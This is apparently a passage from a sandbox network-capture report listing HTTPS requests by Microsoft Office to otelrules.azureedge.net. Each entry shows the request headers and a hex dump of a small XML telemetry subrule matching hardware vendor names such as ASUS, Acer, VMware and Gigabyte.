                                                                                                                    Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120615" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120613" /> <SR T="2" R="([Aa][Ss][Uu][Ss])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true">


                                                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                    32192.168.2.44982113.107.246.63443
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    2024-11-25 18:53:15 UTC192OUTGET /rules/rule120616v0s19.xml HTTP/1.1
                                                                                                                    Connection: Keep-Alive
                                                                                                                    Accept-Encoding: gzip
                                                                                                                    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                    Host: otelrules.azureedge.net
                                                                                                                    2024-11-25 18:53:16 UTC470INHTTP/1.1 200 OK
                                                                                                                    Date: Mon, 25 Nov 2024 18:53:16 GMT
                                                                                                                    Content-Type: text/xml
                                                                                                                    Content-Length: 486
                                                                                                                    Connection: close
                                                                                                                    Cache-Control: public, max-age=604800, immutable
                                                                                                                    Last-Modified: Tue, 09 Apr 2024 00:26:29 GMT
                                                                                                                    ETag: "0x8DC582BB344914B"
                                                                                                                    x-ms-request-id: 9bcae678-901e-007b-2946-3cac50000000
                                                                                                                    x-ms-version: 2018-03-28
                                                                                                                    x-azure-ref: 20241125T185316Z-15b8b599d885ffrhhC1TEBtuv000000006cg00000000dhby
                                                                                                                    x-fd-int-roxy-purgeid: 0
                                                                                                                    X-Cache: TCP_HIT
                                                                                                                    Accept-Ranges: bytes
                                                                                                                    2024-11-25 18:53:16 UTC486INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 36 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                    Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120616" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120615" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                    33192.168.2.44982413.107.246.63443
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    2024-11-25 18:53:16 UTC192OUTGET /rules/rule120619v0s19.xml HTTP/1.1
                                                                                                                    Connection: Keep-Alive
                                                                                                                    Accept-Encoding: gzip
                                                                                                                    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                    Host: otelrules.azureedge.net
                                                                                                                    2024-11-25 18:53:16 UTC470INHTTP/1.1 200 OK
                                                                                                                    Date: Mon, 25 Nov 2024 18:53:16 GMT
                                                                                                                    Content-Type: text/xml
                                                                                                                    Content-Length: 407
                                                                                                                    Connection: close
                                                                                                                    Cache-Control: public, max-age=604800, immutable
                                                                                                                    Last-Modified: Tue, 09 Apr 2024 00:25:41 GMT
                                                                                                                    ETag: "0x8DC582B9698189B"
                                                                                                                    x-ms-request-id: b82db720-b01e-0053-528c-3acdf8000000
                                                                                                                    x-ms-version: 2018-03-28
                                                                                                                    x-azure-ref: 20241125T185316Z-174c587ffdf6b487hC1TEBydsn00000006b0000000003r45
                                                                                                                    x-fd-int-roxy-purgeid: 0
                                                                                                                    X-Cache: TCP_HIT
                                                                                                                    Accept-Ranges: bytes
                                                                                                                    2024-11-25 18:53:16 UTC407INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 39 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 41 61 5d 5b 43 63 5d 5b 45 65 5d 5b 52 72 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20 20
                                                                                                                    Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120619" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120617" /> <SR T="2" R="([Aa][Cc][Ee][Rr])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true">


                                                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                    34192.168.2.44982313.107.246.63443
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    2024-11-25 18:53:16 UTC192OUTGET /rules/rule120618v0s19.xml HTTP/1.1
                                                                                                                    Connection: Keep-Alive
                                                                                                                    Accept-Encoding: gzip
                                                                                                                    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                    Host: otelrules.azureedge.net
                                                                                                                    2024-11-25 18:53:16 UTC470INHTTP/1.1 200 OK
                                                                                                                    Date: Mon, 25 Nov 2024 18:53:16 GMT
                                                                                                                    Content-Type: text/xml
                                                                                                                    Content-Length: 486
                                                                                                                    Connection: close
                                                                                                                    Cache-Control: public, max-age=604800, immutable
                                                                                                                    Last-Modified: Tue, 09 Apr 2024 00:25:30 GMT
                                                                                                                    ETag: "0x8DC582B9018290B"
                                                                                                                    x-ms-request-id: aff2abcc-f01e-0003-4547-3c4453000000
                                                                                                                    x-ms-version: 2018-03-28
                                                                                                                    x-azure-ref: 20241125T185316Z-178bfbc474bnwsh4hC1NYC2ubs000000080g000000003zkr
                                                                                                                    x-fd-int-roxy-purgeid: 0
                                                                                                                    X-Cache: TCP_HIT
                                                                                                                    Accept-Ranges: bytes
                                                                                                                    2024-11-25 18:53:16 UTC486INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 38 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                    Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120618" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120617" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                    35192.168.2.44982213.107.246.63443
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    2024-11-25 18:53:16 UTC192OUTGET /rules/rule120617v0s19.xml HTTP/1.1
                                                                                                                    Connection: Keep-Alive
                                                                                                                    Accept-Encoding: gzip
                                                                                                                    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                    Host: otelrules.azureedge.net
                                                                                                                    2024-11-25 18:53:16 UTC470INHTTP/1.1 200 OK
                                                                                                                    Date: Mon, 25 Nov 2024 18:53:16 GMT
                                                                                                                    Content-Type: text/xml
                                                                                                                    Content-Length: 427
                                                                                                                    Connection: close
                                                                                                                    Cache-Control: public, max-age=604800, immutable
                                                                                                                    Last-Modified: Tue, 09 Apr 2024 00:26:02 GMT
                                                                                                                    ETag: "0x8DC582BA310DA18"
                                                                                                                    x-ms-request-id: 922c5f4e-601e-005c-577c-3bf06f000000
                                                                                                                    x-ms-version: 2018-03-28
                                                                                                                    x-azure-ref: 20241125T185316Z-174c587ffdfgcs66hC1TEB69cs0000000690000000002ff2
                                                                                                                    x-fd-int-roxy-purgeid: 0
                                                                                                                    X-Cache: TCP_HIT
                                                                                                                    Accept-Ranges: bytes
                                                                                                                    2024-11-25 18:53:16 UTC427INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 37 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 4d 6d 5d 5b 49 69 5d 5b 43 63 5d 5b 52 72 5d 5b 4f 6f 5d 5b 53 73 5d 5b 4f 6f 5d 5b 46 66 5d 5b 54 74 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20
                                                                                                                    Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120617" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120615" /> <SR T="2" R="([Mm][Ii][Cc][Rr][Oo][Ss][Oo][Ff][Tt])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W"


                                                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                    36192.168.2.44982513.107.246.63443
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    2024-11-25 18:53:18 UTC192OUTGET /rules/rule120620v0s19.xml HTTP/1.1
                                                                                                                    Connection: Keep-Alive
                                                                                                                    Accept-Encoding: gzip
                                                                                                                    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                    Host: otelrules.azureedge.net
                                                                                                                    2024-11-25 18:53:18 UTC470INHTTP/1.1 200 OK
                                                                                                                    Date: Mon, 25 Nov 2024 18:53:18 GMT
                                                                                                                    Content-Type: text/xml
                                                                                                                    Content-Length: 469
                                                                                                                    Connection: close
                                                                                                                    Cache-Control: public, max-age=604800, immutable
                                                                                                                    Last-Modified: Tue, 09 Apr 2024 00:26:41 GMT
                                                                                                                    ETag: "0x8DC582BBA701121"
                                                                                                                    x-ms-request-id: 4089be80-401e-00a3-7501-3f8b09000000
                                                                                                                    x-ms-version: 2018-03-28
                                                                                                                    x-azure-ref: 20241125T185318Z-15b8b599d88f9wfchC1TEBm2kc00000006hg0000000031p3
                                                                                                                    x-fd-int-roxy-purgeid: 0
                                                                                                                    X-Cache: TCP_HIT
                                                                                                                    Accept-Ranges: bytes
                                                                                                                    2024-11-25 18:53:18 UTC469INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                    Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120620" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120619" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                    37192.168.2.44982613.107.246.63443
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    2024-11-25 18:53:18 UTC192OUTGET /rules/rule120621v0s19.xml HTTP/1.1
                                                                                                                    Connection: Keep-Alive
                                                                                                                    Accept-Encoding: gzip
                                                                                                                    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                    Host: otelrules.azureedge.net
                                                                                                                    2024-11-25 18:53:18 UTC470INHTTP/1.1 200 OK
                                                                                                                    Date: Mon, 25 Nov 2024 18:53:18 GMT
                                                                                                                    Content-Type: text/xml
                                                                                                                    Content-Length: 415
                                                                                                                    Connection: close
                                                                                                                    Cache-Control: public, max-age=604800, immutable
                                                                                                                    Last-Modified: Tue, 09 Apr 2024 00:26:03 GMT
                                                                                                                    ETag: "0x8DC582BA41997E3"
                                                                                                                    x-ms-request-id: b82db7f7-b01e-0053-188c-3acdf8000000
                                                                                                                    x-ms-version: 2018-03-28
                                                                                                                    x-azure-ref: 20241125T185318Z-174c587ffdfcj798hC1TEB9bq400000006gg00000000a62d
                                                                                                                    x-fd-int-roxy-purgeid: 0
                                                                                                                    X-Cache: TCP_HIT
                                                                                                                    Accept-Ranges: bytes
                                                                                                                    2024-11-25 18:53:18 UTC415INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 56 76 5d 5b 4d 6d 5d 5b 57 77 5d 5b 41 61 5d 5b 52 72 5d 5b 45 65 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75
                                                                                                                    Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120621" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120619" /> <SR T="2" R="([Vv][Mm][Ww][Aa][Rr][Ee])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="tru


                                                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                    38192.168.2.44982713.107.246.63443
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    2024-11-25 18:53:18 UTC192OUTGET /rules/rule120622v0s19.xml HTTP/1.1
                                                                                                                    Connection: Keep-Alive
                                                                                                                    Accept-Encoding: gzip
                                                                                                                    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                    Host: otelrules.azureedge.net
                                                                                                                    2024-11-25 18:53:18 UTC470INHTTP/1.1 200 OK
                                                                                                                    Date: Mon, 25 Nov 2024 18:53:18 GMT
                                                                                                                    Content-Type: text/xml
                                                                                                                    Content-Length: 477
                                                                                                                    Connection: close
                                                                                                                    Cache-Control: public, max-age=604800, immutable
                                                                                                                    Last-Modified: Tue, 09 Apr 2024 00:26:38 GMT
                                                                                                                    ETag: "0x8DC582BB8CEAC16"
                                                                                                                    x-ms-request-id: 4834b854-301e-005d-3ab8-3ee448000000
                                                                                                                    x-ms-version: 2018-03-28
                                                                                                                    x-azure-ref: 20241125T185318Z-15b8b599d88m7pn7hC1TEB4axw00000006eg000000004x8t
                                                                                                                    x-fd-int-roxy-purgeid: 0
                                                                                                                    X-Cache: TCP_HIT
                                                                                                                    Accept-Ranges: bytes
                                                                                                                    2024-11-25 18:53:18 UTC477INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 32 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                    Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120622" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120621" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                    39192.168.2.44982813.107.246.63443
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    2024-11-25 18:53:18 UTC192OUTGET /rules/rule120623v0s19.xml HTTP/1.1
                                                                                                                    Connection: Keep-Alive
                                                                                                                    Accept-Encoding: gzip
                                                                                                                    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                    Host: otelrules.azureedge.net
                                                                                                                    2024-11-25 18:53:18 UTC470INHTTP/1.1 200 OK
                                                                                                                    Date: Mon, 25 Nov 2024 18:53:18 GMT
                                                                                                                    Content-Type: text/xml
                                                                                                                    Content-Length: 464
                                                                                                                    Connection: close
                                                                                                                    Cache-Control: public, max-age=604800, immutable
                                                                                                                    Last-Modified: Tue, 09 Apr 2024 00:25:43 GMT
                                                                                                                    ETag: "0x8DC582B97FB6C3C"
                                                                                                                    x-ms-request-id: 8189730a-201e-0003-216a-3bf85a000000
                                                                                                                    x-ms-version: 2018-03-28
                                                                                                                    x-azure-ref: 20241125T185318Z-178bfbc474bwh9gmhC1NYCy3rs000000081g000000000xys
                                                                                                                    x-fd-int-roxy-purgeid: 0
                                                                                                                    X-Cache: TCP_HIT
                                                                                                                    Accept-Ranges: bytes
                                                                                                                    2024-11-25 18:53:18 UTC464INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 33 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 47 67 5d 5b 49 69 5d 5b 47 67 5d 5b 41 61 5d 5b 42 62 5d 5b 59 79 5d 5b 54 74 5d 5b 45 65 5d 20 5b 54 74 5d 5b 45 65 5d 5b 43 63 5d 5b 48 68 5d 5b 4e 6e 5d 5b 4f 6f 5d 5b 4c 6c 5d 5b 4f 6f 5d 5b 47 67 5d 5b 59 79 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72
                                                                                                                    Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120623" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120621" /> <SR T="2" R="([Gg][Ii][Gg][Aa][Bb][Yy][Tt][Ee] [Tt][Ee][Cc][Hh][Nn][Oo][Ll][Oo][Gg][Yy])"> <S T="1" F="1" M="Ignor


                                                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                    40192.168.2.44982913.107.246.63443
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    2024-11-25 18:53:18 UTC192OUTGET /rules/rule120624v0s19.xml HTTP/1.1
                                                                                                                    Connection: Keep-Alive
                                                                                                                    Accept-Encoding: gzip
                                                                                                                    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                    Host: otelrules.azureedge.net
                                                                                                                    2024-11-25 18:53:18 UTC470INHTTP/1.1 200 OK
                                                                                                                    Date: Mon, 25 Nov 2024 18:53:18 GMT
                                                                                                                    Content-Type: text/xml
                                                                                                                    Content-Length: 494
                                                                                                                    Connection: close
                                                                                                                    Cache-Control: public, max-age=604800, immutable
                                                                                                                    Last-Modified: Tue, 09 Apr 2024 00:26:35 GMT
                                                                                                                    ETag: "0x8DC582BB7010D66"
                                                                                                                    x-ms-request-id: f1d8b84e-f01e-0096-7de6-3d10ef000000
                                                                                                                    x-ms-version: 2018-03-28
                                                                                                                    x-azure-ref: 20241125T185318Z-178bfbc474bscnbchC1NYCe7eg000000082g0000000058ca
                                                                                                                    x-fd-int-roxy-purgeid: 0
                                                                                                                    X-Cache: TCP_HIT
                                                                                                                    Accept-Ranges: bytes
                                                                                                                    2024-11-25 18:53:18 UTC494INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 34 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                    Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120624" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120623" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                    41192.168.2.44983113.107.246.63443
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    2024-11-25 18:53:20 UTC192OUTGET /rules/rule120626v0s19.xml HTTP/1.1
                                                                                                                    Connection: Keep-Alive
                                                                                                                    Accept-Encoding: gzip
                                                                                                                    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                    Host: otelrules.azureedge.net
                                                                                                                    2024-11-25 18:53:20 UTC470INHTTP/1.1 200 OK
                                                                                                                    Date: Mon, 25 Nov 2024 18:53:20 GMT
                                                                                                                    Content-Type: text/xml
                                                                                                                    Content-Length: 472
                                                                                                                    Connection: close
                                                                                                                    Cache-Control: public, max-age=604800, immutable
                                                                                                                    Last-Modified: Tue, 09 Apr 2024 00:25:53 GMT
                                                                                                                    ETag: "0x8DC582B9DACDF62"
                                                                                                                    x-ms-request-id: 40d9340c-a01e-0050-06b8-3edb6e000000
                                                                                                                    x-ms-version: 2018-03-28
                                                                                                                    x-azure-ref: 20241125T185320Z-178bfbc474bpnd5vhC1NYC4vr400000007yg000000002qxm
                                                                                                                    x-fd-int-roxy-purgeid: 0
                                                                                                                    X-Cache: TCP_HIT
                                                                                                                    Accept-Ranges: bytes
                                                                                                                    2024-11-25 18:53:20 UTC472INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 36 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                    Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120626" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120625" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                    42192.168.2.44983013.107.246.63443
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    2024-11-25 18:53:20 UTC192OUTGET /rules/rule120625v0s19.xml HTTP/1.1
                                                                                                                    Connection: Keep-Alive
                                                                                                                    Accept-Encoding: gzip
                                                                                                                    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                    Host: otelrules.azureedge.net
                                                                                                                    2024-11-25 18:53:20 UTC470INHTTP/1.1 200 OK
                                                                                                                    Date: Mon, 25 Nov 2024 18:53:20 GMT
                                                                                                                    Content-Type: text/xml
                                                                                                                    Content-Length: 419
                                                                                                                    Connection: close
                                                                                                                    Cache-Control: public, max-age=604800, immutable
                                                                                                                    Last-Modified: Tue, 09 Apr 2024 00:25:42 GMT
                                                                                                                    ETag: "0x8DC582B9748630E"
                                                                                                                    x-ms-request-id: 5931471e-001e-0046-7a23-3dda4b000000
